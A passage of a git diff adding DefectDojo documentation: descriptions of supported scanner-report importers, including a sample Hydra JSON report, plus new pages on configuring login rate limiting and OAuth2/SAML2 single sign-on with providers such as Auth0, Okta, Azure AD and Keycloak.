GitLab Dependency Scanning Report + +Import Dependency Scanning Report vulnerabilities in JSON format: https://docs.gitlab.com/ee/user/application_security/dependency_scanning/#reports-json-format + +### Github Vulnerability + +Import findings from Github vulnerability scan: + + +Currently the parser is able to manage only `RepositoryVulnerabilityAlert` object. +The parser has some kind of search feature which detect the data in the report. + +Here is the mandatory objects and attributes: +``` +vulnerabilityAlerts (RepositoryVulnerabilityAlert object) + + id + + createdAt (optional) + + vulnerableManifestPath (optional) + + securityVulnerability (SecurityVulnerability object) + + severity (CRITICAL/HIGH/LOW/MODERATE) + + package (optional) + + name (optional) + + advisory (SecurityAdvisory object) + + description + + summary + + description + + identifiers + + value + + references (optional) + + url (optional) + + cvss (optional) + + vectorString (optional) +``` + +References: + - https://docs.github.com/en/graphql/reference/objects#repositoryvulnerabilityalert + - https://docs.github.com/en/graphql/reference/objects#securityvulnerability + +Github v4 graphql query to fetch data: + +{{< highlight graphql >}} + query getVulnerabilitiesByOwner($owner: String!) { + search(query: $owner, type: REPOSITORY, first: 100) { + nodes { + ... on Repository { + name + vulnerabilityAlerts(last: 100) { + nodes { + id + securityVulnerability { + severity + package { + name + } + advisory { + description + summary + identifiers { + type + value + } + references { + url + } + } + } + } + } + } + } + } + } +{{< /highlight >}} + +Another example of Python script that query one repository: + +```python + +import json +import requests + + +query = """ +query getVulnerabilitiesByRepoAndOwner($name: String!, $owner: String!) { + repository(name: $name, owner: $owner) { + vulnerabilityAlerts(first: 100) { + nodes { + id + createdAt + securityVulnerability { + severity + package { + name + ecosystem + } + advisory { + description + summary + identifiers { + value + type + } + references { + url + } + cvss { + vectorString + } + } + } + vulnerableManifestPath + } + } + } +} +""" + +token = '...' # generated from GitHub settings +headers = {"Authorization": "Bearer " + token} + + +request = requests.post(url='https://api.github.com/graphql', + json={ + "operationName": "getVulnerabilitiesByRepoAndOwner", + 'query': query, + 'variables': { + 'name': 'gogoph', + 'owner': 'damiencarol' + } + }, + headers=headers) + +result = request.json() +print(json.dumps(result, indent=2)) +``` + +### Hadolint + +Hadolint Dockerfile scan in json format. + +### Harbor Vulnerability + +Import findings from Harbor registry container scan: + + +### Horusec + +Import findings from Horusec scan. + +```shell +./horusec_linux_x64 start -O=report.json -o json -i="tests/" +``` + +References: + * [GitHub repository](https://github.com/ZupIT/horusec) + +### HuskyCI Report + +Import JSON reports from +[HuskyCI]() + +### Hydra + +Import JSON reports from [THC Hydra](https://github.com/vanhauser-thc/thc-hydra). + +Hydra can discover weak login credentials on different types of services (e.g. RDP). + +As Hydra cannot provide a severity rating (as it doesn't know how severe a weak login is at this scanned service), all imported findings will be rated 'High'. + +Sample JSON report: +```json +{ + "errormessages": [ + "[ERROR] Error Message of Something", + "[ERROR] Another Message", + "These are very free form" + ], + "generator": { + "built": "2019-03-01 14:44:22", + "commandline": "hydra -b jsonv1 -o results.json ... ...", + "jsonoutputversion": "1.00", + "server": "127.0.0.1", + "service": "http-post-form", + "software": "Hydra", + "version": "v8.5" + }, + "quantityfound": 1, + "results": [ + { + "host": "127.0.0.1", + "login": "bill@example.com", + "password": "bill", + "port": 9999, + "service": "http-post-form" + } + ], + "success": false +} +``` + + +### IBM AppScan DAST + +XML file from IBM App Scanner. + +### Immuniweb Scan + +XML Scan Result File from Immuniweb Scan. + +### IntSights Report + +IntSights Threat Command is a commercial Threat Intelligence platform that monitors both the open and dark web to identify threats for the Assets you care about (Domain Names, IP addresses, Brand Names, etc.). + +#### Manual Import +Use the Export CSV feature in the IntSights Threat Command GUI to create an *IntSights Alerts.csv* file. This CSV +file can then be imported into Defect Dojo. + +#### Automated Import + +The IntSights `get-complete-alert` API only returns details for a single alert. To automate the process, +individually fetch details for each alert and append to a list. The list is then saved as the value for the key +"Alerts". This JSON object can then be imported into Defect Dojo. + +Example: + + { + "Alerts":[ + { + "_id":"5c80egf83b4a3900078b6be6", + "Details":{ + "Source":{ + "URL":"https://www.htbridge.com/websec/?id=ABCDEF", + "Date":"2018-03-08T00:01:02.622Z", + "Type":"Other", + "NetworkType":"ClearWeb" + }, + "Images":[ + "5c80egf833963a40007e01e8d", + "5c80egf833b4a3900078b6bea", + "5c80egf834626bd0007bd64db" + ], + "Title":"HTTP headers weakness in example.com web server", + "Tags":[], + "Type":"ExploitableData", + "Severity":"Critical", + "SubType":"VulnerabilityInTechnologyInUse", + "Description":"X-XSS-PROTECTION and CONTENT-SECURITY-POLICY headers were not sent by the server, which makes it vulnerable for various attack vectors" + }, + "Assignees":[ + "5c3c8f99903dfd0006ge5e61" + ], + "FoundDate":"2018-03-08T00:01:02.622Z", + "Assets":[ + { + "Type":"Domains", + "Value":"example.com" + } + ], + "TakedownStatus":"NotSent", + "IsFlagged":false, + "UpdateDate":"2018-03-08T00:01:02.622Z", + "RelatedIocs":[], + "RelatedThreatIDs":[], + "Closed":{ + "IsClosed":false + } + } + ] + } + +### JFrogXRay + +Import the JSON format for the \"Security Export\" file. Use this importer for Xray version 2.X + +### JFrog XRay Unified + +Import the JSON format for the \"Security & Compliance | Reports\" export. Jfrog's Xray tool is an add-on to their Artifactory repository that does Software Composition Analysis, see https://www.jfrog.com/confluence/display/JFROG/JFrog+Xray for more information. \"Xray Unified\" refers to Xray Version 3.0 and later. + +### JFrog Xray API Summary Artifact Scan + +Import the JSON format from the Arifact Summary API call https://www.jfrog.com/confluence/display/JFROG/Xray+REST+API#XrayRESTAPI-ArtifactSummary + +### Kiuwan Scanner + +Import Kiuwan Scan in CSV format. Export as CSV Results on Kiuwan. + +### kube-bench Scanner + +Import JSON reports of Kubernetes CIS benchmark scans. + +### KICS Scanner + +Import of JSON report from + +### Meterian Scanner + +The Meterian JSON report output file can be imported. + +### Microfocus Webinspect Scanner + +Import XML report + +### MobSF Scanner + +Export a JSON file using the API, api/v1/report\_json. + +### Mobsfscan + +Import JSON report from + +### Mozilla Observatory Scanner + +Import JSON report. + +### Nessus (Tenable) + +Reports can be imported in the CSV, and .nessus (XML) report formats. + +### Nessus WAS (Tenable) + +Reports can be imported in the CSV, and .nessus (XML) report formats. + +### Netsparker + +Vulnerabilities List - JSON report + +### Nexpose XML 2.0 (Rapid7) + +Use the full XML export template from Nexpose. + +### Nikto + +Nikto web server scanner - https://cirt.net/Nikto2 + +The current parser support 3 sources: + - XML output (old) + - new XML output (with nxvmlversion=\"1.2\" type) + - JSON output + +See: https://github.com/sullo/nikto + +### Nmap + +XML output (use -oX) + +### Node Security Platform + +Node Security Platform (NSP) output file can be imported in JSON format. + +### NPM Audit + +Node Package Manager (NPM) Audit plugin output file can be imported in +JSON format. Only imports the \'advisories\' subtree. + +### Nuclei + +Import JSON output of nuclei scan report + +### Openscap Vulnerability Scan + +Import Openscap Vulnerability Scan in XML formats. + +### OpenVAS CSV + +Import OpenVAS Scan in CSV format. Export as CSV Results on OpenVAS. + +### OssIndex Devaudit + +Import JSON formatted output from \[OSSIndex +Devaudit\](). + +### Oss Review Toolkit + +Import ORT Evaluated model reporter in JSON Format. +(Example)\[\] + +### PHP Security Audit v2 + +Import PHP Security Audit v2 Scan in JSON format. + +### PHP Symfony Security Checker + +Import results from the PHP Symfony Security Checker. + +### Probely + +Synchronize Probely Plus findings with DefectDojo. + +To setup this integration set the DefectDojo URL and API key on the +Integrations page on Probely. Then, select which Product, Engagement, +and, optionally, the Test you want to synchronize to. The API key needs +to belong to a staff user. + +Works with DefectDojo 1.5.x and 1.6.x. Probely also supports non-public +DefectDojo instances. + +For detailed instructions on how to configure Probely and DefectDojo, +see + + +### Qualys Scan + +Qualys output files can be imported in API XML format. Qualys output +files can be imported in WebGUI XML format. + +A CSV formatted Qualys Scan Report can also be used. Ensure the following values are checked in the Scan Report Template config: + +`CVSS Version = CVSSv3` + +* Vulnerability Details + * Threat + * Impact +* Solution + * Patches and Workarounds + * Virtual Patches and Mitigating Controls +* Results + +### Qualys Webapp Scan + +Qualys WebScan output files can be imported in XML format. + +### Retire.js + +Retire.js JavaScript scan (\--js) output file can be imported in JSON +format. + +### Risk Recon API Importer + +Import findings from Risk Recon via the API. Configure your own JSON +report as follows + +{{< highlight json >}} +{ + "url_endpoint": "https://api.riskrecon.com/v1", + "api_key": "you-api-key", + "companies": [ + { + "name": "Company 1", + "filters": { + "domain_name": [], + "ip_address": ["127.0.0.1"], + "host_name": ["localhost"], + "asset_value": [], + "severity": ["critical", "high"], + "priority": [], + "hosting_provider": [], + "country_name": [] + } + }, + { + "name": "Company 2", + "filters": { + "ip_address": ["0.0.0.0"] + } + } + + ], + "filters": { + "domain_name": [], + "ip_address": [], + "host_name": [], + "asset_value": [], + "severity": ["critical"], + "priority": [], + "hosting_provider": [], + "country_name": [] + } +} +{{< /highlight >}} + +- More than one company finding list can be queried with it\'s own set + of filters. Company 1 shows all available fitlers, while Company 2 + shows that empty filters need not be present. +- To query all companies in your Risk Recon instance, simple remove + the \"companies\" field entirely. +- If the \"companies\" field is not present, and filtering is still + requested, the \"filters\" field can be used to filter all findings + across all companies. It carries the same behavior as the company + filters. The \"filters\" field is disregarded in the prescense of + the \"companies\" field. +- Removing both fields will allow retrieval of all findings in the + Risk Recon instance. + +### Rusty Hog parser + +From: Import the JSON output. +Rusty Hog is a secret scanner built in Rust for performance, and based on TruffleHog which is written in Python. + +DefectDojo currently supports the parsing of the following Rusty Hog JSON outputs: +- Choctaw Hog: Scans for secrets in a Git repository. +- Duroc Hog: Scans for secrets in directories, files, and archives. +- Gottingen Hog: Scans for secrets in a JIRA issue. +- Essex Hog: Scans for secrets in a Confluence page. + +### SARIF + +OASIS Static Analysis Results Interchange Format (SARIF). SARIF is +supported by many tools. More details about the format here: + + +{{% alert title="Information" color="info" %}} +SARIF parser customizes the Test_Type with data from the report. +For example, a report with `Dockle` as a driver name will produce a Test with a Test_Type named `Dockle Scan (SARIF)` +{{% /alert %}} + +{{% alert title="Warning" color="warning" %}} +Current implementation is limited and will aggregate all the findings in the SARIF file in one single report. +{{% /alert %}} + +### ScoutSuite + +Multi-Cloud security auditing tool. It uses APIs exposed by cloud +providers. Scan results are located at +`scan-reports/scoutsuite-results/scoutsuite\_\*.json` files. +Multiple scans will create multiple files if they are runing agains +different Cloud projects. See + +### Semgrep JSON Report + +Import Semgrep output (--json) + +### SKF Scan + +Output of SKF Sprint summary export. + +### Snyk + +Snyk output file (snyk test \--json \> snyk.json) can be imported in +JSON format. Only SCA (Software Composition Analysis) report is supported (SAST report not supported yet). + +### SonarQube Scan (Aggregates findings per cwe, title, description, file\_path.) + +SonarQube output file can be imported in HTML format. + +To generate the report, see + + +Version: \>= 1.1.0 + +### SonarQube Scan Detailed (Import all findings from SonarQube html report.) + +SonarQube output file can be imported in HTML format. + +To generate the report, see + + +Version: \>= 1.1.0 + +### SonarQube API Import + +SonarQube API will be accessed to gather the report. No report file is +required. + +Follow these steps to setup the SonarQube API import: + +1. Configure the Sonarqube authentication details by navigating to + Configuration / Tool Configuration. Note the url must be in the + format of `https:///api`. Select the tool + type to be SonarQube. By default the tool will import vulnerabilities issues + and security hotspots only, + but additional filters can be setup using the Extras field separated by + commas (e.g. BUG,VULNERABILITY,CODE_SMELL) +2. In the Product settings add an API Scan Configuration. *Service key 1* must + be the SonarQube project key, which can be found by navigating to a specific project and + selecting the value from the url + `https:///dashboard?id=key`. + When you do not provide a SonarQube project key, DefectDojo will + use the name of the Product as the project key in SonarQube. If you would like to + import findings from multiple projects, you can specify multiple keys as + separated API Scan Configuration in the Product settings. +3. Once all of the settings are made, the SonarQube API Import will be + able to import all vulnerability information from the SonarQube + instance. In the import or re-import dialog you can select which API Scan + Configuration shall be used. If you do not choose + any, DefectDojo will use the API Scan Configuration of the Product if there is + only one defined or the SonarQube Tool Configuration if there is only one. + +**Note:**: If `https` is used for the SonarQube, the certificate must be +trusted by the DefectDojo instance. + + +### SpotBugs + +XML report of textui cli. + +### Sonatype + +JSON output. + +### SSL Labs + +JSON Output of ssllabs-scan cli. + +### Sslscan + +Import XML output of sslscan report. + +### Sslyze Scan + +XML report of SSLyze version 2 scan + +### SSLyze 3 Scan (JSON) + +JSON report of SSLyze version 3 scan + +### StackHawk HawkScan + +Import the JSON webhook event from StackHawk. +For more information, check out our [docs on hooking up StackHawk to Defect Dojo](https://docs.stackhawk.com/workflow-integrations/defect-dojo.html) + +### Testssl Scan + +Import CSV output of testssl scan report. + +### Terrascan + +Import JSON output of terrascan scan report + +### Trivy + +JSON report of [trivy scanner](https://github.com/aquasecurity/trivy). + +### Trufflehog + +JSON Output of Trufflehog. + +### Trustwave + +CSV output of Trustwave vulnerability scan. + +### Twistlock + +JSON output of the `twistcli` tool. Example: + +{{< highlight bash >}} +./twistcli images scan --address https:// --user --details --output-file= +{{< /highlight >}} + +The CSV output from the UI is now also accepted. + +### TFSec + +Import of JSON report from + +### Visual Code Grepper (VCG) +VCG output can be imported in CSV or Xml formats. + +### Veracode + +Detailed XML Report + +### Wapiti Scan + +Import XML report. + +### Whitesource Scan + +Import JSON report + +### Wpscan Scanner + +Import JSON report. + +### Wfuzz JSON importer + +Import the result of Wfuzz (https://github.com/xmendez/wfuzz) if you export in JSON the result (`wfuzz -o json -f myJSONReport.json,json`). + +The return code matching are directly put in Severity as follow(this is hardcoded in the parser actually). + +HTTP Return Code | Severity +-----------------|--------- +200 | High +401 | Medium +403 | Medium +407 | Medium +500 | Low + +### Xanitizer + +Import XML findings list report, preferably with parameter +\'generateDetailsInFindingsListReport=true\'. + +### Yarn Audit + +Import Yarn Audit scan report in JSON format. Use something like `yarn audit --json > yarn_report.json`. + +### Zed Attack Proxy + +ZAP XML report format. diff --git a/docs/content/en/integrations/rate_limiting.md b/docs/content/en/integrations/rate_limiting.md new file mode 100644 index 00000000000..0cac784c5f5 --- /dev/null +++ b/docs/content/en/integrations/rate_limiting.md @@ -0,0 +1,55 @@ +--- +title: "Rate Limiting" +description: "Configurable rate limiting on the login page to mitigate brute force attacks" +draft: false +weight: 9 +--- + + +DefectDojo has protection against brute force attacks through rate limiting + +## Configuration + +For further information, please visit the package documentation [Django Ratelimit](https://django-ratelimit.readthedocs.io/en/stable/index.html) + +#### Enable Rate Limiting + +To enable and configure rate limiting, edit the settings (see [Configuration]({{< ref "/getting_started/configuration" >}})) and edit/replace the following information: + +{{< highlight python >}} +DD_RATE_LIMITER_ENABLED=(bool, True), +DD_RATE_LIMITER_RATE=(str, '5/m'), +DD_RATE_LIMITER_BLOCK=(bool, True), +DD_RATE_LIMITER_ACCOUNT_LOCKOUT=(bool, True), +{{< /highlight >}} + +#### Rate Limit + +The frequency at which the request will be limited can be set to + +* seconds - `1s` +* minutes - `5m` +* hours - `100h` +* days - `2400d` + +Extended configuration can be found [here](https://django-ratelimit.readthedocs.io/en/stable/rates.html) + +#### Block Requests + +By default, rate limiting is set to record offenses, but does not actually block requests and enforce the limit. + +Setting `DD_RATE_LIMITER_BLOCK` will block all incoming requests at the configured frequncy once that frequency has been exceeded. + +#### Account Lockout + +In the event of a brute force attack, a users credentials could potentially be comprimised. + +In an attempt to circumvent that event, setting `DD_RATE_LIMITER_ACCOUNT_LOCKOUT` will force a user to reset their password upon the next attempted login. + +#### Multi-Process Behavior + +When using configurations with multiple uwsgi processes, the rate limiting package uses the default cache that is memory based and local to a process. + +#### Extra Configuation + +For further information, please visit the package documentation [Django Ratelimit](https://django-ratelimit.readthedocs.io/en/stable/index.html) diff --git a/docs/content/en/integrations/social-authentication.md b/docs/content/en/integrations/social-authentication.md new file mode 100644 index 00000000000..6e28f7712c3 --- /dev/null +++ b/docs/content/en/integrations/social-authentication.md @@ -0,0 +1,460 @@ +--- +title: "Authentication via OAuth2/SAML2" +description: "OAuth2/SAML2 let users authenticate against enterprise directories." +draft: false +weight: 3 +--- + +## Auth0 + +In the same way as with other identity providers, it's now possible to +leverage Auth0 to authenticate users on DefectDojo. + +1. Inside your Auth0 dashboard create a new application (Applications / + Create Application / Single Page Web Application). +2. On the new application set the following fields: + - Name: "Defectdojo" + - Allowed Callback URLs: + [https://the_hostname_you_have_dojo_deployed:your_server_port/complete/auth0/](https://the_hostname_you_have_dojo_deployed:your_server_port/complete/auth0/) +3. Copy the following info from the application: + - Domain + - Client ID + - Client Secret +4. Now, edit the settings (see [Configuration]({{< ref "/getting_started/configuration" >}})) with the following + information: + + {{< highlight python >}} + DD_SOCIAL_AUTH_AUTH0_OAUTH2_ENABLED=True + DD_SOCIAL_AUTH_AUTH0_KEY=(str, '**YOUR_CLIENT_ID_FROM_STEP_ABOVE**'), + DD_SOCIAL_AUTH_AUTH0_SECRET=(str,'**YOUR_CLIENT_SECRET_FROM_STEP_ABOVE**'), + DD_SOCIAL_AUTH_AUTH0_DOMAIN=(str, '**YOUR_AUTH0_DOMAIN_FROM_STEP_ABOVE**'), + {{< /highlight >}} + +5. Restart DefectDojo, and you should now see a **Login with Auth0** + button on the login page. + +## Google + +New to DefectDojo, a Google account can now be used for Authentication, +Authorization, and a DefectDojo user. Upon login with a Google account, +a new user will be created if one does not already exist. The criteria +for determining whether a user exists is based on the users username. In +the event a new user is created, the username is that of the Google +address without the domain. Once created, the user creation process will +not happen again as the user is recalled by its username, and logged in. +In order to make the magic happen, a Google authentication server needs +to be created. Closely follow the steps below to guarantee success. + +1. Navigate to the following address and either create a new account, + or login with an existing one: [Google Developers + Console](https://console.developers.google.com) +2. Once logged in, find the key shaped button labeled **Credentials** + on the left side of the screen. Click **Create Credentials**, and + choose **OAuth Client ID**: + + ![image](../../images/google_1.png) + +3. Select **Web Applications**, and provide a descriptive name for the + client. + + ![image](../../images/google_2.png) + +4. Add the pictured URLs in the **Authorized Redirect URLs** section. + This part is very important. If there are any mistakes here, the + authentication client will not authorize the request, and deny + access. +5. Once all URLs are added, finish by clicking **Create** + +6. Now with the authentication client created, the **Client ID** and + **Client Secret Key** need to be copied over to the settings. + Click the newly created client and copy the values: + + ![image](../../images/google_3.png) + +7. Edit the settings (see [Configuration]({{< ref "/getting_started/configuration" >}})) with the following + information: + + {{< highlight python >}} + DD_SOCIAL_AUTH_GOOGLE_OAUTH2_ENABLED=True, + DD_SOCIAL_AUTH_GOOGLE_OAUTH2_KEY=(str, '**YOUR_CLIENT_ID_FROM_STEP_ABOVE**'), + DD_SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET=(str, '**YOUR_CLIENT_SECRET_FROM_STEP_ABOVE**'), + {{< /highlight >}} + + To authorize users you will need to set the following: + + {{< highlight python >}} + DD_SOCIAL_AUTH_GOOGLE_OAUTH2_WHITELISTED_DOMAINS = ['example.com', 'example.org'] + {{< /highlight >}} + + or + + {{< highlight python >}} + DD_SOCIAL_AUTH_GOOGLE_OAUTH2_WHITELISTED_EMAILS = [''] + {{< /highlight >}} + +OKTA +---- + +In a similar fashion to that of Google, using OKTA as a OAuth2 provider +carries the same attributes and a similar procedure. Follow along below. + +1. Navigate to the following address and either create a new account, + or login with an existing one: [OKTA Account + Creation](https://www.okta.com/developer/signup/) +2. Once logged in, enter the **Applications** and click **Add + Application**: + + ![image](../../images/okta_1.png) + +3. Select **Web Applications**. + + ![image](../../images/okta_2.png) + +4. Add the pictured URLs in the **Login Redirect URLs** section. This + part is very important. If there are any mistakes here, the + authentication client will not authorize the request, and deny + access. Check the **Implicit** box as well. + + ![image](../../images/okta_3.png) + +5. Once all URLs are added, finish by clicking **Done**. + +6. Return to the **Dashboard** to find the **Org-URL**. Note this value + as it will be important in the settings file. + + ![image](../../images/okta_4.png) + +7. Now, with the authentication client created, the **Client ID** and + **Client Secret** Key need to be copied over to the settings. + Click the newly created client and copy the values: + + ![image](../../images/okta_5.png) + +8. Edit the settings (see [Configuration]({{< ref "/getting_started/configuration" >}})) with the following + information: + + {{< highlight python >}} + DD_SOCIAL_AUTH_OKTA_OAUTH2_ENABLED=True, + DD_SOCIAL_AUTH_OKTA_OAUTH2_KEY=(str, '**YOUR_CLIENT_ID_FROM_STEP_ABOVE**'), + DD_SOCIAL_AUTH_OKTA_OAUTH2_SECRET=(str, '**YOUR_CLIENT_SECRET_FROM_STEP_ABOVE**'), + DD_SOCIAL_AUTH_OKTA_OAUTH2_API_URL=(str, 'https://{your-org-url}/oauth2/default'), + {{< /highlight >}} + +If during the login process you get the following error: *The +'redirect_uri' parameter must be an absolute URI that is whitelisted +in the client app settings.* and the `redirect_uri` HTTP +GET parameter starts with `http://` instead of +`https://` you need to add +`SOCIAL_AUTH_REDIRECT_IS_HTTPS = True` in the settings. + +## Azure Active Directory +### Azure AD Configuration +You can now use your corporate Azure Active Directory to authenticate +users to Defect Dojo. Users will be using your corporate Azure AD +account (A.K.A. Office 365 identity) to authenticate via OAuth, and all +the conditional access rules and benefits from Azure Active Directory +will also apply to the Defect Dojo Authentication. Once the user signs +in, it will try to match the UPN of the user to an existing e-mail from +a user in Defect Dojo, and if no match is found, a new user will be +created in Defect Dojo, associated with the unique id/value of the user +provided by your Azure AD tenant. Then, you can assign roles to this +user, such as 'staff' or 'superuser' + +1. Navigate to the following address and follow instructions to create + a new app registration + + - + +2. Once you register an app, take note of the following information: + + - **Application (client) ID** + - **Directory (tenant) ID** + - Under Certificates & Secrets, create a new **Client Secret** + +3. Under Authentication > Redirect URIs, add a *WEB* type of uri where + the redirect points to + + - + - **OR** + - [https://the_hostname_you_have_dojo_deployed:your_server_port/complete/azuread-tenant-oauth2/](https://the_hostname_you_have_dojo_deployed:your_server_port/complete/azuread-tenant-oauth2/) + +4. Edit the settings (see [Configuration]({{< ref "/getting_started/configuration" >}})) with the following + information: + + {{< highlight python >}} + DD_SOCIAL_AUTH_AZUREAD_TENANT_OAUTH2_KEY=(str, 'YOUR_APPLICATION_ID_FROM_STEP_ABOVE'), + DD_SOCIAL_AUTH_AZUREAD_TENANT_OAUTH2_SECRET=(str, 'YOUR_CLIENT_SECRET_FROM_STEP_ABOVE'), + DD_SOCIAL_AUTH_AZUREAD_TENANT_OAUTH2_TENANT_ID=(str, 'YOUR_DIRECTORY_ID_FROM_STEP_ABOVE'), + DD_SOCIAL_AUTH_AZUREAD_TENANT_OAUTH2_ENABLED = True + {{< /highlight >}} + +5. Restart your Dojo, and you should now see a **Login with Azure AD** + button on the login page which should *magically* work + +### Automatic Import of User-Groups +To import groups from Azure AD users, the following environment variable needs to be set: + + {{< highlight python >}} + DD_SOCIAL_AUTH_AZUREAD_TENANT_OAUTH2_GET_GROUPS=True + {{< /highlight >}} + +This will ensure the user is added to all the groups found in the Azure AD Token. Any missing groups will be created in DefectDojo (unless filtered). This group synchronization allows for product access via groups to limit the products a user can interact with. +Do not activate `Emit groups as role claims` within the Azure AD "Token configuration". + +To prevent authorization creep, old Azure AD groups a user is not having anymore can be deleted with the following environment parameter: + + {{< highlight python >}} + DD_SOCIAL_AUTH_AZUREAD_TENANT_OAUTH2_CLEANUP_GROUPS=True + {{< /highlight >}} + + To limit the amount of groups imported from Azure AD, a regular expression can be used as the following: + + {{< highlight python >}} + DD_SOCIAL_AUTH_AZUREAD_TENANT_OAUTH2_GROUPS_FILTER='^team-.*' # or 'teamA|teamB|groupC' + {{< /highlight >}} + +## Gitlab + +In a similar fashion to that of Google and OKTA, using Gitlab as a +OAuth2 provider carries the same attributes and a similar procedure. +Follow along below. + +1. Navigate to your Gitlab settings page and got to the Applications + section + + - + - **OR** + - [https://the_hostname_you_have_gitlab_deployed:your_gitlab_port/profile/applications](https://the_hostname_you_have_gitlab_deployed:your_gitlab_port/profile/applications) + +2. Choose a name for your application +3. For the Redirect URI, enter the DefectDojo URL with the following + format + + - [https://the_hostname_you_have_dojo_deployed:your_server_port/complete/gitlab/](https://the_hostname_you_have_dojo_deployed:your_server_port/complete/gitlab/) + +4. Edit the settings (see [Configuration]({{< ref "/getting_started/configuration" >}})) with the following + information: + + {{< highlight python >}} + DD_SOCIAL_AUTH_GITLAB_KEY=(str, 'YOUR_APPLICATION_ID_FROM_STEP_ABOVE'), + DD_SOCIAL_AUTH_GITLAB_SECRET=(str, 'YOUR_SECRET_FROM_STEP_ABOVE'), + DD_SOCIAL_AUTH_GITLAB_API_URL=(str, 'https://gitlab.com'), + DD_SOCIAL_AUTH_GITLAB_OAUTH2_ENABLED = True + {{< /highlight >}} + + Additionally, if you want to import your Gitlab projects as DefectDojo + products, add the following line to your settings: + + {{< highlight python >}} + DD_SOCIAL_AUTH_GITLAB_PROJECT_AUTO_IMPORT = True + {{< /highlight >}} + +5. Restart DefectDojo, and you should now see a **Login with Gitlab** + button on the login page. + +## Keycloak +There is also an option to use Keycloak as OAuth2 provider in order to authenticate users to Defect Dojo, also by using +the social-auth plugin. + +Here are suggestion on how to configure Keycloak and DefectDojo: + +### Configure Keycloak +(assuming you already have an existing realm, otherwise create one) +1. Navigate to your keycloak realm and add a new client of type openid-connect. Choose a name for the client id and use this value below for DD_SOCIAL_AUTH_KEYCLOAK_KEY). +2. In the client settings: + * Set `access type` to `confidential` + * Under `valid Redirect URIs`, add the URI to your defect dojo installation, e.g. 'https:///*' + * Under `web origins`, add the same (or '+') + * Under `Fine grained openID connect configuration` -> `user info signed response algorithm`: set to `RS256` + * Under `Fine grained openID connect configuration` -> `request object signature algorithm`: set to `RS256` + * -> save these settings in keycloak (hit save button) +3. Under `Scope` -> `Full Scope Allowed` set to `off` +4. Under `mappers` -> add a custom mapper here: + * Name: `aud` + * Mapper type: `audience` + * Included audience: select your client/client-id here + * Add ID to token: `off` + * Add access to token: `on` +5. Under `credentials`: copy the secret (and use as DD_SOCIAL_AUTH_KEYCLOAK_SECRET below) +6. In your realm settings -> keys: copy the "Public key" (signing key) (use for DD_SOCIAL_AUTH_KEYCLOAK_PUBLIC_KEY below) +7. In your realm settings -> general -> endpoints: look into openId endpoint configuration + and look up your authorization and token endpoint (use them below) + +### Configure Defect Dojo +Edit the settings (see [Configuration]({{< ref "/getting_started/configuration" >}})) with the following + information: + + {{< highlight python >}} + DD_SESSION_COOKIE_SECURE=True, + DD_CSRF_COOKIE_SECURE=True, + DD_SECURE_SSL_REDIRECT=True, + DD_SOCIAL_AUTH_KEYCLOAK_OAUTH2_ENABLED=True, + DD_SOCIAL_AUTH_KEYCLOAK_PUBLIC_KEY=(str, ''), + DD_SOCIAL_AUTH_KEYCLOAK_KEY=(str, ''), + DD_SOCIAL_AUTH_KEYCLOAK_SECRET=(str, ''), + DD_SOCIAL_AUTH_KEYCLOAK_AUTHORIZATION_URL=(str, ''), + DD_SOCIAL_AUTH_KEYCLOAK_ACCESS_TOKEN_URL=(str, '') + {{< /highlight >}} + +or, alternatively, for helm configuration, add this to the `extraConfig` section: + +``` +DD_SESSION_COOKIE_SECURE: 'True' +DD_CSRF_COOKIE_SECURE: 'True' +DD_SECURE_SSL_REDIRECT: 'True' +DD_SOCIAL_AUTH_KEYCLOAK_OAUTH2_ENABLED: 'True' +DD_SOCIAL_AUTH_KEYCLOAK_PUBLIC_KEY: '' +DD_SOCIAL_AUTH_KEYCLOAK_KEY: '' +DD_SOCIAL_AUTH_KEYCLOAK_SECRET: '' +DD_SOCIAL_AUTH_KEYCLOAK_AUTHORIZATION_URL: '' +DD_SOCIAL_AUTH_KEYCLOAK_ACCESS_TOKEN_URL: '' +``` + +Optionally, you *can* set `DD_SOCIAL_AUTH_KEYCLOAK_LOGIN_BUTTON_TEXT` in order to customize the login button's text caption. + +## GitHub +1. Navigate to GitHub.com and follow instructions to create a new OAuth App [https://docs.github.com/en/developers/apps/building-oauth-apps/creating-an-oauth-app](https://docs.github.com/en/developers/apps/building-oauth-apps/creating-an-oauth-app) +2. Choose a name for your application +3. For the Redirect URI, enter the DefectDojo URL with the following + format + - [https://the_hostname_you_have_dojo_deployed:your_server_port/complete/github/](https://the_hostname_you_have_dojo_deployed:your_server_port/complete/github/) +4. Edit the settings (see [Configuration]({{< ref "/getting_started/configuration" >}})) with the following + information: + {{< highlight python >}} + DD_SOCIAL_AUTH_GITHUB_KEY=(str, 'GitHub OAuth App Client ID'), + DD_SOCIAL_AUTH_GITHUB_SECRET=(str, 'GitHub OAuth App Client Secret'), + DD_SOCIAL_AUTH_GITHUB_OAUTH2_ENABLED = True + {{< /highlight >}} +5. Restart DefectDojo, and you should now see a **Login with GitHub** + button on the login page. + +## GitHub Enterprise +1. Navigate to your GitHub Enterprise Server and follow instructions to create a new OAuth App [https://docs.github.com/en/enterprise-server/developers/apps/building-oauth-apps/creating-an-oauth-app](https://docs.github.com/en/enterprise-server/developers/apps/building-oauth-apps/creating-an-oauth-app) +2. Choose a name for your application +3. For the Redirect URI, enter the DefectDojo URL with the following + format + - [https://the_hostname_you_have_dojo_deployed:your_server_port/complete/github-enterprise/](https://the_hostname_you_have_dojo_deployed:your_server_port/complete/github-enterprise/) +4. Edit the settings (see [Configuration]({{< ref "/getting_started/configuration" >}})) with the following + information: + {{< highlight python >}} + DD_SOCIAL_AUTH_GITHUB_ENTERPRISE_KEY=(str, 'GitHub Enterprise OAuth App Client ID'), + DD_SOCIAL_AUTH_GITHUB_ENTERPRISE_SECRET=(str, 'GitHub Enterprise OAuth App Client Secret'), + DD_SOCIAL_AUTH_GITHUB_ENTERPRISE_URL=(str, 'https://github..com/'), + DD_SOCIAL_AUTH_GITHUB_ENTERPRISE_API_URL=(str, 'https://github..com/api/v3/'), + DD_SOCIAL_AUTH_GITHUB_ENTERPRISE_OAUTH2_ENABLED = True, + {{< /highlight >}} +5. Restart DefectDojo, and you should now see a **Login with GitHub Enterprise** + button on the login page. + +## SAML 2.0 +In a similar direction to OAuth, this SAML addition provides a more secure +perogative to SSO. For definitions of terms used and more information, +see the plugin [plugin homepage](https://github.com/IdentityPython/djangosaml2). + +1. Navigate to your SAML IdP and find your metadata +2. Edit the settings (see [Configuration]({{< ref "/getting_started/configuration" >}})) with the following + information: + + {{< highlight python >}} + DD_SAML2_ENABLED=(bool, **True**), + # SAML Login Button Text + 